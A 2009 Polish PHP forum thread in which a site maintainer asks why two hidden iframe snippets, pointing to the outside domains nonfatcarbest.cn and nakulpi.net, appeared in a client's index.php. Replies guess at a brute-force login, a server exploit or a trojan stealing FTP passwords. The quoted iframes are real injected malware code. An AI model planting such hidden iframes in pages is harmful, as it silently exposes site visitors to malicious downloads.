Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Exploit czy co?
axwell
post
Post #1





Grupa: Zarejestrowani
Postów: 143
Pomógł: 1
Dołączył: 14.11.2007

Ostrzeżenie: (10%)
X----

Znajomy poprosił mnie o pewne przeróbki na stronie jego firmy. Zrobiłem wszystko jak należy, a następnie zakutalizowałem pliki. Oczywiście sprawdzałem czy wszytsko chodzi tak jak powinno. Nie było żadnego problemu. Dziś dzwoni do mnie i mówi że strona nie działa - wywala błąd php w składni w "index.php". Najdziwniejsze jest to, że pliku index.php w ogóle nigdy nie modyfikowałem. Zaglądam do kodu patrze a tu na końcu linijka:

[HTML] pobierz, plaintext 
  1. <iframe src="http://nonfatcarbest.cn/ts/in.cgi?mozila16" width=2 height=4 style="visibility: hidden"></iframe>
[HTML] pobierz, plaintext


i jescze w innym miejscu coś takiego:
[PHP] pobierz, plaintext 
  1. <?php
  2. echo "<iframe src=\"http://nakulpi.net/?click=C42244\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
  3. ?>
[PHP] pobierz, plaintext


Skąd to mogło się wziąć? I jak zapobiec żeby znowu nie "wlazło" ?
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
Shadowsword
post
Post #2





Grupa: Zarejestrowani
Postów: 149
Pomógł: 5
Dołączył: 9.04.2008
Skąd: W-WA

Ostrzeżenie: (0%)
-----

W niedziele miałem takiego exploita u siebie. Firma hostingowa stwierdziła, że włamali się za pomocą brute-forca (podstawianie znaków). W internecie znalazłem też informacje, że jeżeli masz folder tmp na serwerze i CHMOD 711 to jest na to jakiś exploit (nie wiem, czy to prawda) i trzecia możliwość ściągnąłeś trojana i on pobrał hasła z zapamiętanych w kliencie ftp lub zapisując to co wpisywałeś podczas logowania.
Go to the top of the page
+Quote Post

Posty w temacie
- axwell   Exploit czy co?   7.05.2009, 17:45:32
- - Spawnm   było o tym kilka razy , wywal to i zmień hasło do ...   7.05.2009, 17:49:17
- - axwell   Przeszukałem forum i nie mogę znaleźć. Może jednak...   7.05.2009, 17:53:38
- - Spawnm   przecież powiedziałem , wywalasz frame z indexów i...   7.05.2009, 17:55:04
- - axwell   To zrobiłem w pierwszej kolejnosći. Ale proszę o o...   7.05.2009, 17:59:29
- - kwiateusz   z komputera tego osobnika co mial haslo do ftp zwy...   7.05.2009, 18:18:28
- - Shadowsword   W niedziele miałem takiego exploita u siebie. Firm...   7.05.2009, 19:26:32
- - Kocurro   Jak masz gównianie skonfigurowany serwer to nawet ...   8.05.2009, 10:20:12
- - Poker   Pewnie używasz Total Commandera do połączeń z ftp ...   8.05.2009, 10:55:37
- - ExPlOiT   Pisałem już co i jak: http://forum.php.p...   8.05.2009, 12:54:55
- - zwierzołak   CytatW niedziele miałem takiego exploita u siebie....   8.05.2009, 15:44:46
- - Shadowsword   Też nie sądze, że to był brute force, ale tak mi n...   8.05.2009, 16:44:15

« Następny starszy · Hydepark · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 17.10.2025 - 15:30
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn